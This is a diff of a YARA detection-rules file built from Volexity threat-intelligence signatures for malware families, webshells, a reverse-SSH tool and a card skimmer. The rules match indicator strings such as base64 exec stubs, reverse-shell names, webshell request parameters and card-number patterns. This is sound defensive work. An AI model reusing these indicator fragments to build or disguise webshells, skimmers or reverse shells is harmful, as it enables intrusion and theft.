+		$s4 = "Check for connected USB drives" wide ascii
+		$s5 = "Check if filename already exists in record.txt" wide ascii
+		$s6 = "Function to copy files from USB drive to destination folder" wide ascii
 
 	condition:
-		$s1
+		3 of them
 }
-rule VOLEXITY_Apt_Malware_Win_Applejeus_Oct22 : LAZYPINE FILE MEMORY
+rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Script_Lan_Conf : TRANSPARENTJASMINE FILE
 {
 	meta:
-		description = "Detects AppleJeus DLL samples."
+		description = "Detects a script deployed as part of DISGOMOJI malware chain."
 		author = "threatintel@volexity.com"
-		id = "f88e2253-e296-57d8-a627-6cb4ccff7a92"
-		date = "2022-11-03"
-		modified = "2025-05-21"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L1-L22"
+		id = "b338b3cf-22ce-5767-bdea-503e883bc84b"
+		date = "2024-03-07"
+		modified = "2024-07-05"
+		reference = "TIB-20240318"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L188-L215"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "46f3325a7e8e33896862b1971f561f4871670842aecd46bcc7a5a1af869ecdc4"
+		logic_hash = "2a19d5cff7adc9b1b92538a5df4e3cadea694f925f65080f5093fc5425e840f4"
 		score = 75
 		quality = 80
-		tags = "LAZYPINE, FILE, MEMORY"
-		hash1 = "82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629"
-		os = "win"
+		tags = "TRANSPARENTJASMINE, FILE"
+		hash1 = "0b5cf9bd917f0af03dd694ff4ce39b0b34a97c9f41b87feac1dc884a684f60ef"
+		os = "linux"
 		os_arch = "all"
-		scan_context = "file,memory"
+		scan_context = "file"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8495
-		version = 3
+		rule_id = 10312
+		version = 7
 
 	strings:
-		$s1 = "HijackingLib.dll" ascii
+		$s1 = "add_lan_conf_cron_if_not_exists" wide ascii
+		$s2 = "download_if_not_exists" wide ascii
+		$s3 = "add_cron_if_not_exists" wide ascii
+		$s4 = "uevent_seqnum.sh" wide ascii
+		$s5 = "$HOME/.x86_64-linux-gnu" wide ascii
+		$s6 = "lanConfScriptPath" wide ascii
 
 	condition:
-		$s1
+		4 of them
 }
-rule VOLEXITY_Apt_Malware_Win_Applejeus_B_Oct22 : LAZYPINE FILE MEMORY
+rule VOLEXITY_Malware_Golang_Discordc2_Bmdyy_1 : FILE MEMORY
 {
 	meta:
-		description = "Detects unpacked AppleJeus samples."
+		description = "Detects a opensource malware available on github using strings in the binary. The DISGOMOJI malware family used by TransparentJasmine is based on this malware."
 		author = "threatintel@volexity.com"
-		id = "8586dc64-225b-5f28-a6d6-b9b6e8f1c815"
-		date = "2022-11-03"
-		modified = "2025-05-21"
-		reference = "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L24-L54"
+		id = "6816d264-4311-5e90-948b-2e27cdf0b720"
+		date = "2024-03-28"
+		modified = "2024-07-05"
+		reference = "TIB-20240229"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L216-L243"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "76f3c9692ea96d3cadbbcad03477ab6c53445935352cb215152b9b5483666d43"
+		logic_hash = "22b3e5109d0738552fbc310344b2651ab3297e324bc883d5332c1e8a7a1df29b"
 		score = 75
 		quality = 80
-		tags = "LAZYPINE, FILE, MEMORY"
-		hash1 = "9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78"
-		os = "win"
+		tags = "FILE, MEMORY"
+		hash1 = "de32e96d1f151cc787841c12fad88d0a2276a93d202fc19f93631462512fffaf"
+		os = "all"
 		os_arch = "all"
 		scan_context = "file,memory"
-		severity = "critical"
+		severity = "high"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8497
-		version = 5
+		rule_id = 10390
+		version = 3
 
 	strings:
-		$key1 = "AppX7y4nbzq37zn4ks9k7amqjywdat7d"
-		$key2 = "Gd2n5frvG2eZ1KOe"
-		$str1 = "Windows %d(%d)-%s"
-		$str2 = "&act=check"
+		$s1 = "File is bigger than 8MB" wide ascii
+		$s2 = "Uploaded file to" wide ascii
+		$s3 = "sess-%d" wide ascii
+		$s4 = "Session *%s* opened" wide ascii
+		$s5 = "%s%d_%dx%d.png" wide ascii
 
 	condition:
-		( any of ( $key* ) and 1 of ( $str* ) ) or all of ( $str* )
+		4 of them
 }
-rule VOLEXITY_Apt_Malware_Win_Applejeus_C_Oct22 : LAZYPINE MEMORY
+rule VOLEXITY_Malware_Golang_Discordc2_Bmdyy : FILE MEMORY
 {
 	meta:
-		description = "Detects unpacked AppleJeus samples."
+		description = "Detects a opensource malware available on github using strings in the binary. DISGOMOJI used by TransparentJasmine is based on this malware."
 		author = "threatintel@volexity.com"
-		id = "c9cbddde-220c-5e26-8760-85c29b98bfeb"
-		date = "2022-11-03"
-		modified = "2023-09-28"
-		reference = "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L57-L84"
+		id = "1ddbf476-ba2d-5cbb-ad95-38e0ae8db71b"
+		date = "2024-02-22"
+		modified = "2024-07-05"
+		reference = "https://github.com/bmdyy/discord-c2"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L244-L267"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "a9e635d9353c8e5c4992beba79299fb889a7a3d5bc3eaf191f8bb7f51258a6c6"
+		logic_hash = "38b860a43b9937351f74b01983888f18ad101cbe66560feb7455d46b713eba0f"
 		score = 75
 		quality = 80
-		tags = "LAZYPINE, MEMORY"
-		hash1 = "a0db8f8f13a27df1eacbc01505f311f6b14cf9b84fbc7e84cb764a13f001dbbb"
-		os = "win"
+		tags = "FILE, MEMORY"
+		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
+		os = "all"
 		os_arch = "all"
-		scan_context = "memory"
+		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8519
-		version = 3
+		rule_id = 10264
+		version = 12
 
 	strings:
-		$str1 = "%sd.e%sc \"%s > %s 2>&1\"" wide
-		$str2 = "tuid"
-		$str4 = "payload"
-		$str5 = "fconn"
-		$str6 = "Mozilla_%lu"
+		$s1 = "**IP**: %s\n**User**: %s\n**Hostname**: %s\n**OS**: %s\n**CWD**" wide ascii
 
 	condition:
-		5 of ( $str* )
+		$s1
 }
-rule VOLEXITY_Apt_Malware_Win_Applejeus_D_Oct22 : LAZYPINE FILE MEMORY
+rule VOLEXITY_Apt_Malware_Py_Upstyle : UTA0218 FILE MEMORY
 {
 	meta:
-		description = "Detected AppleJeus unpacked samples."
+		description = "Detect the UPSTYLE webshell."
 		author = "threatintel@volexity.com"
-		id = "80d2821b-a437-573e-9e9d-bf79f9422cc9"
-		date = "2022-11-10"
-		modified = "2025-05-21"
-		reference = "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L87-L112"
+		id = "45726f35-8b3e-5095-b145-9e7f6da6838b"
+		date = "2024-04-11"
+		modified = "2024-04-12"
+		reference = "TIB-20240412"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L1-L34"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "23c0642e5be15a75a39d089cd52f2f14d633f7af6889140b9ec6e53c5c023974"
+		logic_hash = "51923600b23d23f4ce29eac7f5ab9f7e1ddb45bed5f6727ddec4dcb75872e473"
 		score = 75
 		quality = 80
-		tags = "LAZYPINE, FILE, MEMORY"
-		hash1 = "a241b6611afba8bb1de69044115483adb74f66ab4a80f7423e13c652422cb379"
-		os = "win"
+		tags = "UTA0218, FILE, MEMORY"
+		hash1 = "3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac"
+		hash2 = "0d59d7bddac6c22230187ef6cf7fa22bca93759edc6f9127c41dc28a2cea19d8"
+		hash3 = "4dd4bd027f060f325bf6a90d01bfcf4e7751a3775ad0246beacc6eb2bad5ec6f"
+		os = "linux"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8534
-		version = 3
+		rule_id = 10429
+		version = 2
 
 	strings:
-		$reg = "Software\\Bitcoin\\Bitcoin-Qt"
-		$pattern = "%s=%d&%s=%s&%s=%s&%s=%d"
-		$exec = " \"%s\", RaitingSetupUI "
-		$http = "Accept: */*" wide
+		$stage1_str1 = "/opt/pancfg/mgmt/licenses/PA_VM"
+		$stage1_str2 = "exec(base64."
+		$stage2_str1 = "signal.signal(signal.SIGTERM,stop)"
+		$stage2_str2 = "exec(base64."
+		$stage3_str1 = "write(\"/*\"+output+\"*/\")"
+		$stage3_str2 = "SHELL_PATTERN"
 
 	condition:
-		all of them
+		all of ( $stage1* ) or all of ( $stage2* ) or all of ( $stage3* )
 }
-rule VOLEXITY_Apt_Delivery_Macro_Lazypine_Jeus_B : LAZYPINE FILE
+rule VOLEXITY_Susp_Any_Jarischf_User_Path : FILE MEMORY
 {
 	meta:
-		description = "Detects macros used by the LazyPine threat actor to distribute AppleJeus."
+		description = "Detects paths embedded in samples in released projects written by Ferdinand Jarisch, a pentester in AISEC. These tools are sometimes used by attackers in real world intrusions."
 		author = "threatintel@volexity.com"
-		id = "ac4d4e82-e29f-5134-999d-b8dcef59d285"
-		date = "2022-11-03"
-		modified = "2025-05-21"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L114-L139"
+		id = "062a6fdb-c516-5643-9c7c-deff32eeb95e"
+		date = "2024-04-10"
+		modified = "2024-04-15"
+		reference = "TIB-20240412"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L59-L81"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "e55199e6ad26894f98e930cd4716127ee868872d08ada1c44675e4db1ec27894"
-		score = 75
+		logic_hash = "574d5b1fadb91c39251600e7d73d4993d4b16565bd1427a0e8d6ed4e7905ab54"
+		score = 50
 		quality = 80
-		tags = "LAZYPINE, FILE"
-		hash1 = "17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b"
-		os = "win"
+		tags = "FILE, MEMORY"
+		hash1 = "161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6"
+		os = "all"
 		os_arch = "all"
-		scan_context = "file"
-		severity = "critical"
+		scan_context = "file,memory"
+		severity = "high"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8493
-		version = 3
+		rule_id = 10424
+		version = 4
 
 	strings:
-		$a1 = ", vbDirectory) = \"\" Then" ascii
-		$a2 = ".Caption & " ascii
-		$a3 = ".nodeTypedValue" ascii
-		$a4 = ".Application.Visible = False" ascii
-		$a5 = " MkDir (" ascii
+		$proj_1 = "/home/jarischf/"
 
 	condition:
-		all of ( $a* )
+		any of ( $proj_* )
 }
-rule VOLEXITY_Apt_Delivery_Office_Macro_Lazypine_Jeus : LAZYPINE FILE
+rule VOLEXITY_Hacktool_Golang_Reversessh_Fahrj : FILE MEMORY
 {
 	meta:
-		description = "Detects malicious documents used by LazyPine in a campaign dropping the AppleJeus malware."
+		description = "Detects a reverse SSH utility available on GitHub. Attackers may use this tool or similar tools in post-exploitation activity."
 		author = "threatintel@volexity.com"
-		id = "f9a92f47-aa1d-56ea-ac59-47cc559f379f"
-		date = "2022-11-02"
-		modified = "2025-05-21"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L141-L165"
+		id = "332e323f-cb16-5aa2-8b66-f3d6d50d94f2"
+		date = "2024-04-10"
+		modified = "2024-04-12"
+		reference = "TIB-20240412"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L82-L116"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "54d5396b889a45d81122301eadf77f73135937fbe9647ad60491ac7856faf5ad"
+		logic_hash = "38b40cc7fc1e601da2c7a825f1c2eff209093875a5829ddd2f4c5ad438d660f8"
 		score = 75
 		quality = 80
-		tags = "LAZYPINE, FILE"
-		hash1 = "17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b"
+		tags = "FILE, MEMORY"
+		hash1 = "161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6"
 		os = "all"
 		os_arch = "all"
-		scan_context = "file"
+		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 8490
-		version = 7
+		rule_id = 10423
+		version = 5
 
 	strings:
-		$s1 = "0M8R4K" ascii
-		$s2 = "bin.base64" ascii
-		$s3 = "dragon" ascii
-		$s4 = "Workbook_Open" ascii
+		$fun_1 = "createLocalPortForwardingCallback"
+		$fun_2 = "createReversePortForwardingCallback"
+		$fun_3 = "createPasswordHandler"
+		$fun_4 = "createPublicKeyHandler"
+		$fun_5 = "createSFTPHandler"
+		$fun_6 = "dialHomeAndListen"
+		$fun_7 = "createExtraInfoHandler"
+		$fun_8 = "createSSHSessionHandler"
+		$fun_9 = "createReversePortForwardingCallback"
+		$proj_1 = "github.com/Fahrj/reverse-ssh"
 
 	condition:
-		all of ( $s* )
+		any of ( $proj_* ) or 4 of ( $fun_* )
 }
 rule VOLEXITY_Apt_Malware_Rb_Rokrat_Loader : INKYPINE FILE MEMORY
 {
@@ -163597,7 +163544,7 @@ rule VOLEXITY_Apt_Malware_Rb_Rokrat_Loader : INKYPINE FILE MEMORY
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
 		logic_hash = "30ae14fd55a3ab60e791064f69377f3b9de9b871adfd055f435df657f89f8007"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "INKYPINE, FILE, MEMORY"
 		hash1 = "5bc52f6c1c0d0131cee30b4f192ce738ad70bcb56e84180f464a5125d1a784b2"
 		os = "win"
@@ -163792,6 +163739,176 @@ rule VOLEXITY_Apt_Webshell_Aspx_Sportsball : FILE MEMORY
 	condition:
 		any of ( $uniq* ) or all of ( $s* )
 }
+rule VOLEXITY_Malware_Win_Backwash_Cpp : WHEELEDASH FILE MEMORY
+{
+	meta:
+		description = "CPP loader for the Backwash malware."
+		author = "threatintel@volexity.com"
+		id = "8a1c4ff1-1827-5e6f-b838-664d8c3be840"
+		date = "2021-11-17"
+		modified = "2023-11-13"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2021/2021-12-06 - XEGroup/indicators/yara.yar#L3-L26"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "c8ed2d3103aa85363acd7f5573aeb936a5ab5a3bacbcf1f04e6b298299f24dae"
+		score = 75
+		quality = 80
+		tags = "WHEELEDASH, FILE, MEMORY"
+		hash1 = "0cf93de64aa4dba6cec99aa5989fc9c5049bc46ca5f3cb327b49d62f3646a852"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6147
+		version = 2
+
+	strings:
+		$s1 = "cor1dbg.dll" wide
+		$s2 = "XEReverseShell.exe" wide
+		$s3 = "XOJUMAN=" wide
+
+	condition:
+		2 of them
+}
+rule VOLEXITY_Malware_Win_Iis_Shellsave : WHEELEDASH FILE MEMORY
+{
+	meta:
+		description = "Detects an AutoIT backdoor designed to run on IIS servers and to install a webshell."
+		author = "threatintel@volexity.com"
+		id = "a89defa5-4b22-5650-a0c0-f4b3cf3377a7"
+		date = "2021-11-17"
+		modified = "2023-08-17"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2021/2021-12-06 - XEGroup/indicators/yara.yar#L27-L49"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "f34d6f4ecaa4cde5965f6b0deac55c7133a2be96f5c466f34775be6e7f730493"
+		score = 75
+		quality = 80
+		tags = "WHEELEDASH, FILE, MEMORY"
+		hash1 = "21683e02e11c166d0cf616ff9a1a4405598db7f4adfc87b205082ae94f83c742"
+		scan_context = "file,memory"
+		severity = "high"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6146
+		version = 4
+
+	strings:
+		$s1 = "getdownloadshell" ascii
+		$s2 = "deleteisme" ascii
+		$s3 = "sitepapplication" ascii
+		$s4 = "getapplicationpool" ascii
+
+	condition:
+		all of them
+}
+rule VOLEXITY_Malware_Win_Backwash_Iis_Scout : WHEELEDASH FILE MEMORY
+{
+	meta:
+		description = "Simple backdoor which collects information about the IIS server it is installed on. It appears to the attacker refers to this components as 'XValidate' - i.e. to validate infected machines."
+		author = "threatintel@volexity.com"
+		id = "1f768b39-21a0-574d-9043-5104540003f7"
+		date = "2021-11-17"
+		modified = "2023-08-17"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2021/2021-12-06 - XEGroup/indicators/yara.yar#L50-L78"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "18c4e338905ff299d75534006037e63a8f9b191f062cc97b0592245518015f88"
+		score = 75
+		quality = 80
+		tags = "WHEELEDASH, FILE, MEMORY"
+		hash1 = "6f44a9c13459533a1f3e0b0e698820611a18113c851f763797090b8be64fd9d5"
+		scan_context = "file,memory"
+		severity = "high"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6145
+		version = 3
+
+	strings:
+		$s1 = "SOAPRequest" ascii
+		$s2 = "requestServer" ascii
+		$s3 = "getFiles" ascii
+		$s4 = "APP_POOL_CONFIG" wide
+		$s5 = "<virtualDirectory" wide
+		$s6 = "stringinstr" ascii
+		$s7 = "504f5354" wide
+		$s8 = "XValidate" ascii
+		$s9 = "XEReverseShell" ascii
+		$s10 = "XERsvData" ascii
+
+	condition:
+		6 of them
+}
+rule VOLEXITY_Malware_Js_Xeskimmer : WHEELEDASH FILE
+{
+	meta:
+		description = "Detects JScript code using in skimming credit card details."
+		author = "threatintel@volexity.com"
+		id = "2c0911cf-a679-5d4e-baad-777745a28e27"
+		date = "2021-11-17"
+		modified = "2023-11-14"
+		reference = "https://github.com/MBThreatIntel/skimmers/blob/master/null_gif_skimmer.js"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2021/2021-12-06 - XEGroup/indicators/yara.yar#L79-L114"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "cc46e9fab5f408fde13c3897d378a1a2e4acb448f40ca4935c19024ebdc252d7"
+		score = 75
+		quality = 80
+		tags = "WHEELEDASH, FILE"
+		hash1 = "92f9593cfa0a28951cae36755d54de63631377f1b954a4cb0474fa0b6193c537"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6144
+		version = 4
+
+	strings:
+		$s1 = ".match(/^([3456]\\d{14,15})$/g" ascii
+		$s2 = "^(p(wd|ass(code|wd|word)))" ascii
+		$b1 = "c('686569676874')" ascii
+		$b2 = "c('7769647468')" ascii
+		$c1 = "('696D67')" ascii
+		$c2 = "('737263')" ascii
+		$magic = "d=c.charCodeAt(b),a+=d.toString(16);"
+
+	condition:
+		all of ( $s* ) or all of ( $b* ) or all of ( $c* ) or $magic
+}
+rule VOLEXITY_Malware_Win_Backwash_Iis : WHEELEDASH FILE MEMORY
+{
+	meta:
+		description = "Variant of the BACKWASH malware family with IIS worm functionality."
+		author = "threatintel@volexity.com"
+		id = "08a86a58-32af-5c82-90d2-d6603dae8d63"
+		date = "2020-09-04"
+		modified = "2023-08-17"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2021/2021-12-06 - XEGroup/indicators/yara.yar#L181-L208"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		hash = "98e39573a3d355d7fdf3439d9418fdbf4e42c2e03051b5313d5c84f3df485627"
+		logic_hash = "95a7f9e0afb031b49cd0da66b5a887d26ad2e06cce625bc45739b4a80e96ce9c"
+		score = 75
+		quality = 80
+		tags = "WHEELEDASH, FILE, MEMORY"
+		scan_context = "file,memory"
+		severity = "high"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 231
+		version = 6
+
+	strings:
+		$a1 = "GetShell" ascii
+		$a2 = "smallShell" ascii
+		$a3 = "createSmallShell" ascii
+		$a4 = "getSites" ascii
+		$a5 = "getFiles " ascii
+		$b1 = "action=saveshell&domain=" ascii wide
+		$b2 = "&shell=backsession.aspx" ascii wide
+
+	condition:
+		all of ( $a* ) or any of ( $b* )
+}
 rule VOLEXITY_Apt_Malware_Win_Dolphin : INKYPINE FILE MEMORY
 {
 	meta:
@@ -164017,176 +164134,6 @@ rule VOLEXITY_Apt_Malware_Win_Freshfire : COZYLARCH FILE
 	condition:
 		(pe.number_of_exports == 1 and pe.exports ( "WaitPrompt" ) ) or any of ( $uniq* ) or 2 of ( $path* )
 }
-rule VOLEXITY_Malware_Win_Backwash_Cpp : WHEELEDASH FILE MEMORY
-{
-	meta:
-		description = "CPP loader for the Backwash malware."
-		author = "threatintel@volexity.com"
-		id = "8a1c4ff1-1827-5e6f-b838-664d8c3be840"
-		date = "2021-11-17"
-		modified = "2023-11-13"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2021/2021-12-06 - XEGroup/indicators/yara.yar#L3-L26"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "c8ed2d3103aa85363acd7f5573aeb936a5ab5a3bacbcf1f04e6b298299f24dae"
-		score = 75
-		quality = 80
-		tags = "WHEELEDASH, FILE, MEMORY"
-		hash1 = "0cf93de64aa4dba6cec99aa5989fc9c5049bc46ca5f3cb327b49d62f3646a852"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6147
-		version = 2
-
-	strings:
-		$s1 = "cor1dbg.dll" wide
-		$s2 = "XEReverseShell.exe" wide
-		$s3 = "XOJUMAN=" wide
-
-	condition:
-		2 of them
-}
-rule VOLEXITY_Malware_Win_Iis_Shellsave : WHEELEDASH FILE MEMORY
-{
-	meta:
-		description = "Detects an AutoIT backdoor designed to run on IIS servers and to install a webshell."
-		author = "threatintel@volexity.com"
-		id = "a89defa5-4b22-5650-a0c0-f4b3cf3377a7"
-		date = "2021-11-17"
-		modified = "2023-08-17"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2021/2021-12-06 - XEGroup/indicators/yara.yar#L27-L49"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "f34d6f4ecaa4cde5965f6b0deac55c7133a2be96f5c466f34775be6e7f730493"
-		score = 75
-		quality = 80
-		tags = "WHEELEDASH, FILE, MEMORY"
-		hash1 = "21683e02e11c166d0cf616ff9a1a4405598db7f4adfc87b205082ae94f83c742"
-		scan_context = "file,memory"
-		severity = "high"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6146
-		version = 4
-
-	strings:
-		$s1 = "getdownloadshell" ascii
-		$s2 = "deleteisme" ascii
-		$s3 = "sitepapplication" ascii
-		$s4 = "getapplicationpool" ascii
-
-	condition:
-		all of them
-}
-rule VOLEXITY_Malware_Win_Backwash_Iis_Scout : WHEELEDASH FILE MEMORY
-{
-	meta:
-		description = "Simple backdoor which collects information about the IIS server it is installed on. It appears to the attacker refers to this components as 'XValidate' - i.e. to validate infected machines."
-		author = "threatintel@volexity.com"
-		id = "1f768b39-21a0-574d-9043-5104540003f7"
-		date = "2021-11-17"
-		modified = "2023-08-17"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2021/2021-12-06 - XEGroup/indicators/yara.yar#L50-L78"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "18c4e338905ff299d75534006037e63a8f9b191f062cc97b0592245518015f88"
-		score = 75
-		quality = 80
-		tags = "WHEELEDASH, FILE, MEMORY"
-		hash1 = "6f44a9c13459533a1f3e0b0e698820611a18113c851f763797090b8be64fd9d5"
-		scan_context = "file,memory"
-		severity = "high"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6145
-		version = 3
-
-	strings:
-		$s1 = "SOAPRequest" ascii
-		$s2 = "requestServer" ascii
-		$s3 = "getFiles" ascii
-		$s4 = "APP_POOL_CONFIG" wide
-		$s5 = "<virtualDirectory" wide
-		$s6 = "stringinstr" ascii
-		$s7 = "504f5354" wide
-		$s8 = "XValidate" ascii
-		$s9 = "XEReverseShell" ascii
-		$s10 = "XERsvData" ascii
-
-	condition:
-		6 of them
-}
-rule VOLEXITY_Malware_Js_Xeskimmer : WHEELEDASH FILE
-{
-	meta:
-		description = "Detects JScript code using in skimming credit card details."
-		author = "threatintel@volexity.com"
-		id = "2c0911cf-a679-5d4e-baad-777745a28e27"
-		date = "2021-11-17"
-		modified = "2023-11-14"
-		reference = "https://github.com/MBThreatIntel/skimmers/blob/master/null_gif_skimmer.js"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2021/2021-12-06 - XEGroup/indicators/yara.yar#L79-L114"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "cc46e9fab5f408fde13c3897d378a1a2e4acb448f40ca4935c19024ebdc252d7"
-		score = 75
-		quality = 80
-		tags = "WHEELEDASH, FILE"
-		hash1 = "92f9593cfa0a28951cae36755d54de63631377f1b954a4cb0474fa0b6193c537"
-		os = "win"
-		os_arch = "all"
